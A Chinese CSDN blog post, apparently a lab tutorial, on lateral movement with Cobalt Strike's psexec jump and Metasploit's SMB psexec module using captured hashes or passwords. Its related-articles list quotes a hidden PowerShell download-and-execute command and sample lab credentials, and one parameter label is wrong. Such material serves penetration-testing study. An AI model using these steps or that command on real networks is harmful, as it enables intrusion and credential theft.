cs和msf实现内网横向移动2

最新推荐文章于 2024-06-12 15:25:43 发布
最新推荐文章于 2024-06-12 15:25:43 发布
阅读量756 收藏 3
点赞数
分类专栏: 内网渗透 文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuxinweii/article/details/121023142
版权

一、使用CS的psexec实现哈希攻击

1.在扫描完内网其他主机后选择一台需要传递的主机
2.实验之前必须已经获得用户名的哈希值或明文密码
右键选择jump—>psexec功能
在这里插入图片描述
2.配置参数
选择一个用户名密码和参数,但必须与需要传递的主机信息一致
选择一个监听器和一个已经得到的session
在这里插入图片描述
3.执行命令查看结果
传递成功
在这里插入图片描述
上线成功
在这里插入图片描述

二、使用msf的psexec功能

如果cs一直无法传递,可以试试使用msf的psexec功能
1.配置进入内网路由(前面一篇文章有做法)
在这里插入图片描述2.使用use exploit/windows/smb/psexec模块进行传递
这里总共要配置5个参数(和cs一样)
set rhosts 目标地址
set lport 监听端口
set lhost 监听主机
set smbuser 目标主机名
set smbpass 目标密码
set smbdomain 目标密码
在这里插入图片描述
3.直接run运行
在这里插入图片描述
成功获得会话

RCE11
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-最实用的横向移动总结
告白的博客
10-04 5731
0x00 内网横向移动简介 上期介绍了内网的信息收集,接下来一度时间实现内网横向移动内网的渗透过程一一介绍,通过内网主机掌控整个域环境。 0x01 内网横向移动的两种方式 内网横向移动的方式有传递和漏洞两种: 所谓传递就是通过内置的一系列协议与命令,例如:at,schtasks,psexec,smbexec,wmic,PTH,PTT,PTK等,实现达到渗透其他内网主机,所谓的内网渗透其实就是一个内网的信息收集,掌握了域内的账户密码信息,主机信息,也就掌握了整个域,我们就是要通过横向移动的方式去获取到
使用csmsf进行内网横向移动
qq_46635165的博客
10-10 4609
使用csmsf进行内网横向移动 目标系统为 :192.168.1.123 , 跳板主机为:192.168.1.118 一,使用cs探测内网 1, 将目标上线至CS 2, 使用cs探测内网信息 查看当前目标系统网络情况,确认目标系统所在内网网段 3, 使用cs的portscan功能对内网进行扫描 portscan 192.168.1.115-192.168.1.125 22,80,445,3389 arp 1024 可以看到目标开放了3389,445,80端口; 二,内网横向移动 对当前目标系统所获取
内网渗透测试:内网横向移动基础总结
最新发布
从事厨房信息化行业,万能对接所有点餐系统,kds,智能控菜,酒店协调软件
06-12 150
Windows 7为跳板机用户名:douser密码:Dotest123Windows server 2008为域控(主机名:WIN-ENS2VR5TR3N)用户名:administrator密码:Liu78963攻击者已经获得了Windows7的权限,想要以Windows7作为跳板机进一步渗透内网的Windows server 2008,并且攻击者已经在跳板机上面通过socks代理等技术使自己可以访问到内网的Windows server 2008。
2024HW ---->内网横向移动
huohaowen的博客
04-21 1181
在蓝队的面试过程中,如果你会内网渗透的话,那是肯定的一个加分选项!!!那么从今天开始,我们就来讲一下内网横向移动!!!
内网安全-横向移动-IPC&AT&atexec
m0_65336233的博客
12-29 659
内网渗透-横向移动-API&Atexec
csmsf实现内网横向移动3
wuxinweii的博客
11-02 1593
注:上传通过哈希攻击拿到172.16.1.123的权限,也就是说成功跳转到172.16这个网段,这次通过172.16.1.123拿到172.16.1.119的权限 一、通过172.16.1.123确定172.16.1.119为域控 因为是靶机,所以知道了172.16.1.119为域控 二、通过proxychain代理流量进内网 因为vps无法直接访问到172.16.1.119,所以可以通过172.16.1.123生成一个代理端口来代理流量进入这个网段 1.下载proxychain 参考文章:https://
内网横移方法与实验】
一纸荒芜的博客
08-05 2284
内网横移技术
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
内网MSF11111
01-05
内网渗透测试中,Metasploit(MSF)是一个常用的安全工具,用于模拟攻击和漏洞利用。本文将详细讲解如何在内网环境中配置MSF,包括PostgreSQL数据库的安装、管理以及MSF数据库的设置。 首先,安装PostgreSQL数据库...
msf内网渗透
10-29
在IT安全领域,尤其是渗透测试和网络攻防中,“msf内网渗透”是一个关键话题,涉及到了Metasploit框架(简称MSF)在内部网络中的应用与实践。这一过程通常包括了渗透测试前的环境准备、利用MSF生成有效载荷、设置web...
比较RationalUnifiedProcess(RUP)和MicrosoftSolutionsFramework(MSF)
03-03
火龙果软件工程技术中心 本文内容包括:RUP和MSF的定义第一印象:从MSF到RUP的高层的映射过程设想映射其他元素原则结束语致谢:注释参考文献:现在对本文进行讨论!参考资料本文来自于RationalEdge:...
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
热门推荐
ierciyuan的博客
08-01 1万+
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
横向渗透之PsExec工具使用
qq_46258964的博客
04-16 3715
psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限 PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程, 并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。 PsExec的基本原理是: 通过管道在远程目标机器上创建一个psexec服务, 并在本地磁盘中生成一个名为PSEXESVC的二进制文件, 然后通过psexec服务运行命令,运行结束后删除任务。 利用条件 445端口开放, 知道目标账号密码 PsExec下载地址 优点:可以躲避检测无视杀毒软件
cs内网横向的使用(靶机)
sweetie 的博客
11-02 1562
1.cs上线目标 (1)设置监听器 添加监听 (2) 上线目标 如果目标可以出外网,我们可以使用让目标访问我们的cs服务器上的恶意代码,并下载执行,比较常见的就是使用如下图所使用的模块 根据目标的版本位数,选择是否要用 x64,点击执行后会出现如图所示窗口 复制代码(这里要选择x64的payload) powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:///b'))"
域渗透-横向移动(PTH)
m0_58606546的博客
11-20 271
一:Windows本地认证 ***基础知识*** Windows内部是不保存明文密码的,只保存密码的hash。 本机用户的密码hash是放在本地的SAM文件 里面,域内用户的密码hash是存在域控的NTDS.DIT文件里面。 SAM文件位置:%SystemRoot%\system32\config\sam 当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的“密码”进行对比,如果相同,则认证成功。 ***密码格式*** Administrator:500:AAD3B435B5
DAY39:横向渗透
qq_49433473的博客
08-28 1763
哈希传递攻击概述(PTH) 、横向渗透横向移动工具合集使用及方法、Mimikatz 、Procdump+Mimikatz、psexec 、msf、CrackMapExec批量横向渗透、WMI 命令、Invoke-WmiCommand(PowerShell)
cs的常用命令操作
Shanfenglan's blog
01-11 5125
信息收集 #列出正在登陆的用户 net logons #列出域控(组) net domain_controllers #列出域控列表 net dclist #显示当前域 net domain #列出当前session net sessions #列出盘符 drives 列出当前执行时间很久的任务并删除 jobs jobkill 取消正在下载的文件 cancel 1.txt 创建凭据并执行命令(无回显) 工作组中如果两个机器密码或者说登陆凭据是相同的,那么可以直接dir \ip\c$ 成
MSF的利用
weixin_43570648的博客
04-18 938
其实MSF大部分都用来用ms17_010,其实MSF还有很多功能,比如用他来打打CMS的exp呀,还有对端口的攻击,生成payload,在此,我也记一个笔记,供大家分享。 1.首先基于MSF的资产收集 网络主机收集: use auxiliary/scanner/discovery/udp_probe use auxiliary/scanner/discovery/udp_sweep use au...
[渗透测试]ATT&CK实战 | Vulnstack 红队(二)
Y4tacker的博客
12-06 1867
文章目录环境来源为什么写这篇文章配置nmap扫描启动smbserver共享文件服务打爆weblogic提权使用 procdump64+mimikatz 获取 win 用户明文密生成管理帐号密码用户凭证-连接域控服务器-反弹域控 shel参考文章 环境来源 来源于https://mp.weixin.qq.com/s/uLlWJdcAc6MmUyuruHygNA,尊重人家作者,还是自己去问人家要吧 为什么写这篇文章 给一些不必要细节删除,以及一些自己觉得细节的补充 配置 nmap扫描 常用端口是开放状态1
msf和frp内网穿透
08-19
msf和frp都是常用于内网穿透的工具,可以帮助远程访问和控制内网中的设备。 Metasploit Framework(简称msf)是一个开源的渗透测试框架,它提供了丰富的渗透测试工具和模块。虽然msf主要是用于渗透测试和漏洞利用,但它也可以通过反向连接来实现内网穿透。你可以在目标机器上执行一个反向Shell并将其连接到外部控制台,从而实现内网设备的访问。 Frp是一个高性能的反向代理工具,可以帮助将内网服务暴露到公网中,实现内网穿透。通过在内网中启动Frp客户端,并在公网服务器上启动Frp服务器端,你可以将内网中的服务映射到公网IP上,从而实现内网设备的远程访问。 总之,无论你选择使用msf还是frp,都可以帮助你实现内网穿透,让你可以方便地远程访问和控制内网中的设备。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值